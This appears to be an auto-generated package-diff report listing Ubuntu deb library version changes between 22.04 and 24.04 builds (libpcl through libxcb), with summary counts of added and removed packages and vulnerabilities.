Changes for packages of type deb (2656 changes)

➖	libpcl-filters1.12	1.12.1+dfsg-3build1
➕	libpcl-filters1.14		1.14.0+dfsg-1
➖	libpcl-io1.12	1.12.1+dfsg-3build1
➕	libpcl-io1.14		1.14.0+dfsg-1
➖	libpcl-kdtree1.12	1.12.1+dfsg-3build1
➕	libpcl-kdtree1.14		1.14.0+dfsg-1
➖	libpcl-keypoints1.12	1.12.1+dfsg-3build1
➕	libpcl-keypoints1.14		1.14.0+dfsg-1
➖	libpcl-ml1.12	1.12.1+dfsg-3build1
➕	libpcl-ml1.14		1.14.0+dfsg-1
➖	libpcl-octree1.12	1.12.1+dfsg-3build1
➕	libpcl-octree1.14		1.14.0+dfsg-1
➖	libpcl-outofcore1.12	1.12.1+dfsg-3build1
➕	libpcl-outofcore1.14		1.14.0+dfsg-1
➖	libpcl-people1.12	1.12.1+dfsg-3build1
➕	libpcl-people1.14		1.14.0+dfsg-1
➖	libpcl-recognition1.12	1.12.1+dfsg-3build1
➕	libpcl-recognition1.14		1.14.0+dfsg-1
➖	libpcl-registration1.12	1.12.1+dfsg-3build1
➕	libpcl-registration1.14		1.14.0+dfsg-1
➖	libpcl-sample-consensus1.12	1.12.1+dfsg-3build1
➕	libpcl-sample-consensus1.14		1.14.0+dfsg-1
➖	libpcl-search1.12	1.12.1+dfsg-3build1
➕	libpcl-search1.14		1.14.0+dfsg-1
➖	libpcl-segmentation1.12	1.12.1+dfsg-3build1
➕	libpcl-segmentation1.14		1.14.0+dfsg-1
➖	libpcl-stereo1.12	1.12.1+dfsg-3build1
➕	libpcl-stereo1.14		1.14.0+dfsg-1
➖	libpcl-surface1.12	1.12.1+dfsg-3build1
➕	libpcl-surface1.14		1.14.0+dfsg-1
➖	libpcl-tracking1.12	1.12.1+dfsg-3build1
➕	libpcl-tracking1.14		1.14.0+dfsg-1
➖	libpcl-visualization1.12	1.12.1+dfsg-3build1
➕	libpcl-visualization1.14		1.14.0+dfsg-1
➖	libpcre16-3	2:8.39-13ubuntu0.22.04.1
♾️	libpcre2-16-0	10.39-3ubuntu0.1	10.42-4ubuntu2.1
♾️	libpcre2-32-0	10.39-3ubuntu0.1	10.42-4ubuntu2.1
♾️	libpcre2-8-0	10.39-3ubuntu0.1	10.42-4ubuntu2.1
♾️	libpcre2-dev	10.39-3ubuntu0.1	10.42-4ubuntu2.1
♾️	libpcre2-posix3	10.39-3ubuntu0.1	10.42-4ubuntu2.1
➖	libpcre3	2:8.39-13ubuntu0.22.04.1
➖	libpcre3-dev	2:8.39-13ubuntu0.22.04.1
➖	libpcre32-3	2:8.39-13ubuntu0.22.04.1
➖	libpcrecpp0v5	2:8.39-13ubuntu0.22.04.1
♾️	libpcsclite1	1.9.5-3ubuntu1	2.0.3-1build1
➖	libperl5.34	5.34.0-3ubuntu1.5
➕	libperl5.38t64		5.38.2-3.2ubuntu0.2
♾️	libperlio-gzip-perl	0.19-1build8	0.20-1build4
➖	libpgm-5.3-0	5.3.128~dfsg-2
➕	libpgm-5.3-0t64		5.3.128~dfsg-2.1build1
♾️	libpgm-dev	5.3.128~dfsg-2	5.3.128~dfsg-2.1build1
➕	libpipewire-0.3-0t64		1.0.5-1ubuntu3.2
♾️	libpixman-1-0	0.40.0-1ubuntu0.22.04.1	0.42.2-1build1
➕	libpixman-1-dev		0.42.2-1build1
➕	libpkgconf3		1.8.1-2build1
➕	libplacebo338		6.338.2-2build1
♾️	libpmix-dev	4.1.2-2ubuntu1	5.0.1-4.1build1
➖	libpmix2	4.1.2-2ubuntu1
➕	libpmix2t64		5.0.1-4.1build1
♾️	libpng-dev	1.6.37-3ubuntu0.1	1.6.43-5ubuntu0.5
➖	libpng16-16	1.6.37-3ubuntu0.1
		Removed vulnerabilities (4):
➕	libpng16-16t64		1.6.43-5ubuntu0.5
♾️	libpocketsphinx3	0.8.0+real5prealpha+1-14ubuntu1	0.8.0+real5prealpha+1-15ubuntu5
♾️	libpolkit-agent-1-0	0.105-33	124-2ubuntu1.24.04.2
♾️	libpolkit-gobject-1-0	0.105-33	124-2ubuntu1.24.04.2
♾️	libpoppler-dev	22.02.0-2ubuntu0.12	24.02.0-1ubuntu9.8
♾️	libpoppler-private-dev	22.02.0-2ubuntu0.12	24.02.0-1ubuntu9.8
➖	libpoppler118	22.02.0-2ubuntu0.12
➕	libpoppler134		24.02.0-1ubuntu9.8
➕	libpopt0		1.19+dfsg-1build1
♾️	libportmidi-dev	1:217-6	1:217-6.1build3
♾️	libportmidi0	1:217-6	1:217-6.1build3
♾️	libpostproc-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libpostproc55	7:4.4.2-0ubuntu0.22.04.1
➕	libpostproc57		7:6.1.1-3ubuntu5
♾️	libpq-dev	14.20-0ubuntu0.22.04.1	16.11-0ubuntu0.24.04.1
♾️	libpq5	14.20-0ubuntu0.22.04.1	16.11-0ubuntu0.24.04.1
➕	libproc2-0		2:4.0.4-4ubuntu3.2
➖	libprocps8	2:3.3.17-6ubuntu2.1
♾️	libproj-dev	8.2.1-1	9.4.0-1build2
➖	libproj22	8.2.1-1
➕	libproj25		9.4.0-1build2
♾️	libprotobuf-dev	3.12.4-1ubuntu7.22.04.4	3.21.12-8.2ubuntu0.2
➖	libprotobuf-lite23	3.12.4-1ubuntu7.22.04.4
➕	libprotobuf-lite32t64		3.21.12-8.2ubuntu0.2
➖	libprotobuf23	3.12.4-1ubuntu7.22.04.4
➕	libprotobuf32t64		3.21.12-8.2ubuntu0.2
♾️	libprotoc-dev	3.12.4-1ubuntu7.22.04.4	3.21.12-8.2ubuntu0.2
➖	libprotoc23	3.12.4-1ubuntu7.22.04.4
➕	libprotoc32t64		3.21.12-8.2ubuntu0.2
♾️	libproxy1v5	0.4.17-2	0.5.4-4build1
➖	libpsl5	0.21.0-1.2build2
➕	libpsl5t64		0.21.2-1.1build1
♾️	libpsm-infinipath1	3.3+20.604758e7-6.1	3.3+20.604758e7-6.3build1
♾️	libpsm2-2	11.2.185-1	11.2.185-2build1
♾️	libpthread-stubs0-dev	0.4-1build2	0.4-1build3
➕	libpugixml-dev		1.14-0.1build1
➕	libpugixml1v5		1.14-0.1build1
♾️	libpulse-dev	1:15.99.1+dfsg1-1ubuntu2.2	1:16.1+dfsg1-2ubuntu10.1
♾️	libpulse-mainloop-glib0	1:15.99.1+dfsg1-1ubuntu2.2	1:16.1+dfsg1-2ubuntu10.1
♾️	libpulse0	1:15.99.1+dfsg1-1ubuntu2.2	1:16.1+dfsg1-2ubuntu10.1
♾️	libpyside2-dev	5.15.2-2build2	5.15.13-1
➖	libpyside2-py3-5.15	5.15.2-2build2
➕	libpyside2-py3-5.15t64		5.15.13-1
♾️	libpython3-dev	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
♾️	libpython3-stdlib	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
➖	libpython3.10	3.10.12-1~22.04.12
➖	libpython3.10-dev	3.10.12-1~22.04.12
➖	libpython3.10-minimal	3.10.12-1~22.04.12
➖	libpython3.10-stdlib	3.10.12-1~22.04.12
➕	libpython3.12-dev		3.12.3-1ubuntu0.11
➕	libpython3.12-minimal		3.12.3-1ubuntu0.11
➕	libpython3.12-stdlib		3.12.3-1ubuntu0.11
➕	libpython3.12t64		3.12.3-1ubuntu0.11
♾️	libqhull-dev	2020.2-4	2020.2-6build1
♾️	libqhull-r8.0	2020.2-4	2020.2-6build1
♾️	libqhull8.0	2020.2-4	2020.2-6build1
♾️	libqhullcpp8.0	2020.2-4	2020.2-6build1
♾️	libqrencode4	4.1.1-1	4.1.1-1build2
♾️	libqt5charts5	5.15.3-1	5.15.13-1
➖	libqt5concurrent5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5concurrent5t64		5.15.13+dfsg-1ubuntu1
➖	libqt5core5a	5.15.3+dfsg-2ubuntu0.2
➕	libqt5core5t64		5.15.13+dfsg-1ubuntu1
➖	libqt5dbus5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5dbus5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5designer5	5.15.3-1	5.15.13-1
♾️	libqt5designercomponents5	5.15.3-1	5.15.13-1
➖	libqt5gui5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5gui5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5help5	5.15.3-1	5.15.13-1
➖	libqt5network5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5network5t64		5.15.13+dfsg-1ubuntu1
➖	libqt5opengl5	5.15.3+dfsg-2ubuntu0.2
♾️	libqt5opengl5-dev	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
➕	libqt5opengl5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5positioning5	5.15.3+dfsg-3	5.15.13+dfsg-1
➖	libqt5printsupport5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5printsupport5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5qml5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5qmlmodels5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5qmlworkerscript5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quick5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quickcontrols2-5	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	libqt5quickparticles5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quickshapes5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quicktemplates2-5	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	libqt5quicktest5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quickwidgets5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5sensors5	5.15.3-1	5.15.13-1
➖	libqt5sql5	5.15.3+dfsg-2ubuntu0.2
♾️	libqt5sql5-sqlite	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
➕	libqt5sql5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5svg5	5.15.3-1	5.15.13-1
➖	libqt5test5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5test5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5webchannel5	5.15.3-1	5.15.13-1
♾️	libqt5webkit5	5.212.0~alpha4-15ubuntu1	5.212.0~alpha4-36
♾️	libqt5webkit5-dev	5.212.0~alpha4-15ubuntu1	5.212.0~alpha4-36
➖	libqt5widgets5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5widgets5t64		5.15.13+dfsg-1ubuntu1
➖	libqt5xml5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5xml5t64		5.15.13+dfsg-1ubuntu1
♾️	libquadmath0	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	librabbitmq4	0.10.0-1ubuntu2	0.11.0-1build2
➕	libraptor2-0		2.0.16-3ubuntu0.1
♾️	libraqm0	0.7.0-4ubuntu1	0.10.1-1build1
➕	librav1e0		0.7.1-2
♾️	libraw1394-11	2.1.2-2build2	2.1.2-2build3
♾️	libraw1394-dev	2.1.2-2build2	2.1.2-2build3
➖	libraw20	0.20.2-2ubuntu2.22.04.2
➕	libraw23t64		0.21.2-2.1ubuntu0.24.04.1
➖	librdmacm1	39.0-1
➕	librdmacm1t64		50.0-2ubuntu0.2
➖	libreadline8	8.1.2-1
➕	libreadline8t64		8.2-4build1
♾️	librhash0	1.4.2-1ubuntu1	1.4.3-3build1
➕	librist4		0.2.10+dfsg-2
➕	librole-tiny-perl		2.002004-1
♾️	librsvg2-2	2.52.5+dfsg-3ubuntu0.2	2.58.0+dfsg-1build1
♾️	librtmp1	2.4+20151223.gitfa8646d.1-2build4	2.4+20151223.gitfa8646d.1-2build7
♾️	librttopo-dev	1.1.0-2	1.1.0-3build2
♾️	librttopo1	1.1.0-2	1.1.0-3build2
♾️	librubberband2	2.0.0-2	3.3.0+dfsg-2build1
➕	libruby		1:3.2~ubuntu1
➖	libruby3.0	3.0.2-7ubuntu2.11
➕	libruby3.2		3.2.3-1ubuntu0.24.04.6
♾️	libsamplerate0	0.2.2-1build1	0.2.2-4build1
➕	libsamplerate0-dev		0.2.2-4build1
♾️	libsasl2-2	2.1.27+dfsg2-3ubuntu1.2	2.1.28+dfsg1-5ubuntu3.1
♾️	libsasl2-modules-db	2.1.27+dfsg2-3ubuntu1.2	2.1.28+dfsg1-5ubuntu3.1
♾️	libsbc1	1.5-3build2	2.0-1build1
♾️	libsdformat14	14.8.0-1~jammy	14.9.0-1~noble
♾️	libsdformat14-dev	14.8.0-1~jammy	14.9.0-1~noble
♾️	libsdl-image1.2	1.2.12-13build1	1.2.12-13build4
♾️	libsdl-image1.2-dev	1.2.12-13build1	1.2.12-13build4
♾️	libsdl-mixer1.2	1.2.12-17build1	1.2.12-18
♾️	libsdl-mixer1.2-dev	1.2.12-17build1	1.2.12-18
♾️	libsdl1.2-dev	1.2.15+dfsg2-6	1.2.68-2
♾️	libsdl1.2debian	1.2.15+dfsg2-6	1.2.68-2
♾️	libsdl2-2.0-0	2.0.20+dfsg-2ubuntu1.22.04.1	2.30.0+dfsg-1ubuntu3.1
♾️	libsdl2-dev	2.0.20+dfsg-2ubuntu1.22.04.1	2.30.0+dfsg-1ubuntu3.1
♾️	libseccomp2	2.5.3-2ubuntu3~22.04.1	2.5.5-1ubuntu3.1
♾️	libselinux1	3.3-1build2	3.5-2ubuntu2.1
♾️	libselinux1-dev	3.3-1build2	3.5-2ubuntu2.1
♾️	libsemanage-common	3.3-1build2	3.5-1build5
♾️	libsemanage2	3.3-1build2	3.5-1build5
♾️	libsensors-config	1:3.6.0-7ubuntu1	1:3.6.0-9build1
♾️	libsensors5	1:3.6.0-7ubuntu1	1:3.6.0-9build1
♾️	libsepol-dev	3.3-1build1	3.5-2build1
♾️	libsepol2	3.3-1build1	3.5-2build1
♾️	libserd-0-0	0.30.10-2	0.32.2-1
➕	libserf-1-1		1.3.10-1ubuntu0.24.04.1
➖	libsfml-audio2.5	2.5.1+dfsg-2
➕	libsfml-audio2.6		2.6.1+dfsg-2build2
♾️	libsfml-dev	2.5.1+dfsg-2	2.6.1+dfsg-2build2
➖	libsfml-graphics2.5	2.5.1+dfsg-2
➕	libsfml-graphics2.6		2.6.1+dfsg-2build2
➖	libsfml-network2.5	2.5.1+dfsg-2
➕	libsfml-network2.6		2.6.1+dfsg-2build2
➖	libsfml-system2.5	2.5.1+dfsg-2
➕	libsfml-system2.6		2.6.1+dfsg-2build2
➖	libsfml-window2.5	2.5.1+dfsg-2
➕	libsfml-window2.6		2.6.1+dfsg-2build2
➕	libsframe1		2.42-4ubuntu2.8
➕	libsharpyuv-dev		1.3.2-0.4build3
➕	libsharpyuv0		1.3.2-0.4build3
♾️	libshiboken2-dev	5.15.2-2build2	5.15.13-1
➖	libshiboken2-py3-5.15	5.15.2-2build2
➕	libshiboken2-py3-5.15t64		5.15.13-1
♾️	libshine3	3.1.1-2	3.1.1-2build1
♾️	libshout3	2.4.5-1build3	2.4.6-1build2
♾️	libsigsegv2	2.13-1ubuntu3	2.14-1ubuntu2
♾️	libslang2	2.3.2-5build4	2.3.3-3build2
➖	libslang2-dev	2.3.2-5build4
♾️	libsm-dev	2:1.2.3-1build2	2:1.2.3-1build3
♾️	libsm6	2:1.2.3-1build2	2:1.2.3-1build3
♾️	libsmartcols1	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libsnappy1v5	1.1.8-1build3	1.1.10-1build1
♾️	libsndfile1	1.0.31-2ubuntu0.2	1.2.2-1ubuntu5.24.04.1
♾️	libsndio-dev	1.8.1-1.1	1.9.0-0.3build3
♾️	libsndio7.0	1.8.1-1.1	1.9.0-0.3build3
♾️	libsocket++1	1.12.13+git20131030.5d039ba-1	1.12.13+git20131030.5d039ba-1build1
♾️	libsodium-dev	1.0.18-1build2	1.0.18-1ubuntu0.24.04.1
♾️	libsodium23	1.0.18-1build2	1.0.18-1ubuntu0.24.04.1
		Removed vulnerabilities (1):
♾️	libsord-0-0	0.16.8-2	0.16.16-2build1
♾️	libsoundtouch1	2.3.1+ds1-1	2.3.2+ds1-1build1
➕	libsoup-3.0-0		3.4.4-5ubuntu0.7
➕	libsoup-3.0-common		3.4.4-5ubuntu0.7
➖	libsoup2.4-1	2.74.2-3ubuntu0.6
➖	libsoup2.4-common	2.74.2-3ubuntu0.6
♾️	libsoxr0	0.1.3-4build2	0.1.3-4build3
➕	libspa-0.2-modules		1.0.5-1ubuntu3.2
➖	libspandsp2	0.0.6+dfsg-2
➕	libspandsp2t64		0.0.6+dfsg-2.1build1
♾️	libspatialite-dev	5.0.1-2build2	5.1.0-3build1
➖	libspatialite7	5.0.1-2build2
➕	libspatialite8t64		5.1.0-3build1
♾️	libspdlog-dev	1:1.9.2+ds-0.2	1:1.12.0+ds-2build1
➖	libspdlog1	1:1.9.2+ds-0.2
➕	libspdlog1.12		1:1.12.0+ds-2build1
➕	libspecio-perl		0.48-1
♾️	libspeex1	1.2~rc1.2-1.1ubuntu3	1.2.1-2ubuntu2.24.04.1
➖	libsphinxbase3	0.8+5prealpha+1-13build1
➕	libsphinxbase3t64		0.8+5prealpha+1-17build2
♾️	libsqlite3-0	3.37.2-2ubuntu0.5	3.45.1-1ubuntu2.5
♾️	libsqlite3-dev	3.37.2-2ubuntu0.5	3.45.1-1ubuntu2.5
♾️	libsratom-0-0	0.6.8-1	0.6.16-1build1
➖	libsrt1.4-gnutls	1.4.4-4
➕	libsrt1.5-gnutls		1.5.3-1build2
♾️	libsrtp2-1	2.4.2-2	2.5.0-3build1
♾️	libss2	1.46.5-2ubuntu1.2	1.47.0-2.4~exp1ubuntu4.1
♾️	libssh-4	0.9.6-2ubuntu0.22.04.5	0.10.6-2ubuntu0.3
♾️	libssh-gcrypt-4	0.9.6-2ubuntu0.22.04.5	0.10.6-2ubuntu0.3
		Removed vulnerabilities (6):
♾️	libssl-dev	3.0.2-0ubuntu1.20	3.0.13-0ubuntu3.7
➖	libssl3	3.0.2-0ubuntu1.20
➕	libssl3t64		3.0.13-0ubuntu3.7
➕	libstb0t64		0.0~git20230129.5736b15+ds-1.2
➖	libstdc++-11-dev	11.4.0-1ubuntu1~22.04.2
➖	libstdc++-11-dev-armhf-cross	11.4.0-1ubuntu1~22.04cross1
➕	libstdc++-13-dev		13.3.0-6ubuntu2~24.04.1
➕	libstdc++-13-dev-armhf-cross		13.3.0-6ubuntu2~24.04cross1
♾️	libstdc++6	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libstdc++6-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
♾️	libstemmer0d	2.2.0-1build1	2.2.0-4build1
➕	libsub-exporter-perl		0.990-1
➕	libsub-exporter-progressive-perl		0.001013-3
➕	libsub-identify-perl		0.14-3build3
➕	libsub-install-perl		0.929-1
➕	libsub-name-perl		0.27-1build3
➕	libsub-quote-perl		2.006008-1ubuntu1
♾️	libsuperlu-dev	5.3.0+dfsg1-2	6.0.1+dfsg1-1build1
➖	libsuperlu5	5.3.0+dfsg1-2
➕	libsuperlu6		6.0.1+dfsg1-1build1
➕	libsvn1		1.14.3-1build4
➕	libsvtav1enc1d1		1.7.0+dfsg-2build1
♾️	libswresample-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libswresample3	7:4.4.2-0ubuntu0.22.04.1
➕	libswresample4		7:6.1.1-3ubuntu5
♾️	libswscale-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libswscale5	7:4.4.2-0ubuntu0.22.04.1
➕	libswscale7		7:6.1.1-3ubuntu5
➕	libsystemd-shared		255.4-1ubuntu8.12

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2656 changes)

♾️	libsystemd0	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	libsz2	1.0.6-1	1.1.2-1build1
♾️	libtag1v5	1.11.1+dfsg.1-3ubuntu3	1.13.1-1build1
♾️	libtag1v5-vanilla	1.11.1+dfsg.1-3ubuntu3	1.13.1-1build1
♾️	libtasn1-6	4.18.0-4ubuntu0.1	4.19.0-3ubuntu0.24.04.2
		Removed vulnerabilities (2):
♾️	libtbb-dev	2021.5.0-7ubuntu2	2021.11.0-2ubuntu2
♾️	libtbb12	2021.5.0-7ubuntu2	2021.11.0-2ubuntu2
➖	libtbb2	2020.3-1ubuntu3
➕	libtbbbind-2-5		2021.11.0-2ubuntu2
♾️	libtbbmalloc2	2021.5.0-7ubuntu2	2021.11.0-2ubuntu2
♾️	libtcl8.6	8.6.12+dfsg-1build1	8.6.14+dfsg-1build1
➖	libtesseract4	4.1.1-2.1build1
➕	libtesseract5		5.3.4-1build5
♾️	libthai-data	0.1.29-1build1	0.1.29-2build1
➕	libthai-dev		0.1.29-2build1
♾️	libthai0	0.1.29-1build1	0.1.29-2build1
♾️	libtheora-dev	1.1.1+dfsg.1-15ubuntu4	1.1.1+dfsg.1-16.1build3
♾️	libtheora0	1.1.1+dfsg.1-15ubuntu4	1.1.1+dfsg.1-16.1build3
♾️	libtiff-dev	4.3.0-6ubuntu0.12	4.5.1+git230720-4ubuntu2.4
➖	libtiff5	4.3.0-6ubuntu0.12
➕	libtiff6		4.5.1+git230720-4ubuntu2.4
➖	libtiffxx5	4.3.0-6ubuntu0.12
➕	libtiffxx6		4.5.1+git230720-4ubuntu2.4
➕	libtimedate-perl		2.3300-2
♾️	libtinfo6	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
➖	libtinyxml-dev	2.6.2-6ubuntu0.22.04.1
➕	libtinyxml2-10		10.0.0+dfsg-2
➖	libtinyxml2-9	9.0.0+dfsg-3
♾️	libtinyxml2-dev	9.0.0+dfsg-3	10.0.0+dfsg-2
♾️	libtinyxml2.6.2v5	2.6.2-6ubuntu0.22.04.1	2.6.2-6.1
♾️	libtirpc-common	1.3.2-2ubuntu0.1	1.3.4+ds-1.1build1
♾️	libtirpc-dev	1.3.2-2ubuntu0.1	1.3.4+ds-1.1build1
➖	libtirpc3	1.3.2-2ubuntu0.1
➕	libtirpc3t64		1.3.4+ds-1.1build1
♾️	libtk8.6	8.6.12-1build1	8.6.14-1build1
♾️	libtool	2.4.6-15build2	2.4.7-7build1
♾️	libtool-bin	2.4.6-15build2	2.4.7-7build1
➕	libtry-tiny-perl		0.31-2
➖	libtsan0	11.4.0-1ubuntu1~22.04.2
➕	libtsan2		14.2.0-4ubuntu2~24.04.1
♾️	libturbojpeg	2.1.2-0ubuntu1	1:2.1.5-2ubuntu2
♾️	libtwolame0	0.4.0-2build2	0.4.0-2build3
♾️	libubsan1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libubsan1-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
♾️	libucx0	1.12.1~rc2-1	1.16.0+ds-5ubuntu1
♾️	libudev-dev	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	libudev1	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	libudfread0	1.1.2-1	1.1.2-1build1
➕	libunibreak5		5.1-2build1
➖	libunistring2	1.0-1
➕	libunistring5		1.1-2build1.1
♾️	libunwind-dev	1.3.2-2build2.1	1.6.2-3build1.1
♾️	libunwind8	1.3.2-2build2.1	1.6.2-3build1.1
➕	liburcu-dev		0.14.0-3.1build1
➕	liburcu8t64		0.14.0-3.1build1
♾️	liburiparser-dev	0.9.6+dfsg-1	0.9.7+dfsg-2build1
♾️	liburiparser1	0.9.6+dfsg-1	0.9.7+dfsg-2build1
♾️	libusb-1.0-0	2:1.0.25-1ubuntu2	2:1.0.27-1
♾️	libusb-1.0-0-dev	2:1.0.25-1ubuntu2	2:1.0.27-1
♾️	libutempter0	1.2.1-2build2	1.2.1-3build1
➕	libutf8proc3		2.9.0-1build1
♾️	libutfcpp-dev	3.2.1-2	3.2.5+really3.2.4-1
♾️	libuuid1	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
➖	libuv1	1.43.0-1ubuntu0.1
♾️	libuv1-dev	1.43.0-1ubuntu0.1	1.48.0-1.1build1
➕	libuv1t64		1.48.0-1.1build1
➖	libv4l-0	1.22.1-2build1
➕	libv4l-0t64		1.26.1-4build3
➖	libv4lconvert0	1.22.1-2build1
➕	libv4lconvert0t64		1.26.1-4build3
♾️	libva-drm2	2.14.0-1	2.20.0-2ubuntu0.1
♾️	libva-x11-2	2.14.0-1	2.20.0-2ubuntu0.1
♾️	libva2	2.14.0-1	2.20.0-2ubuntu0.1
➕	libvariable-magic-perl		0.63-1build3
♾️	libvdpau1	1.4-3build2	1.5-2build1
♾️	libvidstab1.1	1.1.0-2	1.1.0-2build1
♾️	libvisual-0.4-0	0.4.0-17build2	0.4.2-2build1
♾️	libvo-aacenc0	0.1.3-2	0.1.3-2build1
♾️	libvo-amrwbenc0	0.1.3-2	0.1.3-2build1
♾️	libvorbis-dev	1.3.7-1build2	1.3.7-1build3
♾️	libvorbis0a	1.3.7-1build2	1.3.7-1build3
♾️	libvorbisenc2	1.3.7-1build2	1.3.7-1build3
♾️	libvorbisfile3	1.3.7-1build2	1.3.7-1build3
➕	libvpl2		2023.3.0-1build1
➖	libvpx7	1.11.0-2ubuntu2.4
		Removed vulnerabilities (1):
➕	libvpx9		1.14.0-1ubuntu2.3
♾️	libvtk9-dev	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
♾️	libvtk9-java	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
♾️	libvtk9-qt-dev	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
➖	libvtk9.1	9.1.0+really9.1.0+dfsg2-3build1
➖	libvtk9.1-qt	9.1.0+really9.1.0+dfsg2-3build1
➕	libvtk9.1t64		9.1.0+really9.1.0+dfsg2-7.1build3
➕	libvtk9.1t64-qt		9.1.0+really9.1.0+dfsg2-7.1build3
♾️	libvulkan-dev	1.3.204.1-2	1.3.275.0-1build1
♾️	libvulkan1	1.3.204.1-2	1.3.275.0-1build1
♾️	libwacom-common	2.2.0-1	2.10.0-2
♾️	libwacom9	2.2.0-1	2.10.0-2
♾️	libwavpack1	5.4.0-1build2	5.6.0-1build1
♾️	libwayland-bin	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-client0	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-cursor0	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-dev	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-egl1	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-server0	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwebp-dev	1.2.2-2ubuntu0.22.04.2	1.3.2-0.4build3
♾️	libwebp7	1.2.2-2ubuntu0.22.04.2	1.3.2-0.4build3
➕	libwebpdecoder3		1.3.2-0.4build3
♾️	libwebpdemux2	1.2.2-2ubuntu0.22.04.2	1.3.2-0.4build3
♾️	libwebpmux3	1.2.2-2ubuntu0.22.04.2	1.3.2-0.4build3
♾️	libwebrtc-audio-processing1	0.3.1-0ubuntu5	0.3.1-0ubuntu6
♾️	libwebsockets-dev	4.0.20-2ubuntu1	4.3.3-1.1build3
➕	libwebsockets-evlib-ev		4.3.3-1.1build3
➕	libwebsockets-evlib-glib		4.3.3-1.1build3
➕	libwebsockets-evlib-uv		4.3.3-1.1build3
➖	libwebsockets16	4.0.20-2ubuntu1
		Removed vulnerabilities (2):
➕	libwebsockets19t64		4.3.3-1.1build3
♾️	libwildmidi2	0.4.3-1	0.4.3-1build3
♾️	libwoff1	1.0.2-1build4	1.0.2-2build1
➖	libwxbase3.0-0v5	3.0.5.1+dfsg-4
➕	libwxbase3.2-1t64		3.2.4+dfsg-4build1
➕	libwxgtk-gl3.2-1t64		3.2.4+dfsg-4build1
➖	libwxgtk3.0-gtk3-0v5	3.0.5.1+dfsg-4
➕	libwxgtk3.2-1t64		3.2.4+dfsg-4build1
➕	libwxgtk3.2-dev		3.2.4+dfsg-4build1
♾️	libx11-6	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
♾️	libx11-data	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
♾️	libx11-dev	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
♾️	libx11-xcb-dev	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
♾️	libx11-xcb1	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
➖	libx264-163	2:0.163.3060+git5db6aa6-2build1
➕	libx264-164		2:0.164.3108+git31e19f9-1
♾️	libx265-199	3.5-2	3.5-2build1
♾️	libx265-dev	3.5-2	3.5-2build1
♾️	libxau-dev	1:1.0.9-1build5	1:1.0.9-1build6
♾️	libxau6	1:1.0.9-1build5	1:1.0.9-1build6
♾️	libxaw7	2:1.0.14-1	2:1.0.14-1build2
♾️	libxaw7-dev	2:1.0.14-1	2:1.0.14-1build2
➖	libxcb-dri2-0	1.14-3ubuntu3
♾️	libxcb-dri3-0	1.14-3ubuntu3	1.15-1ubuntu2
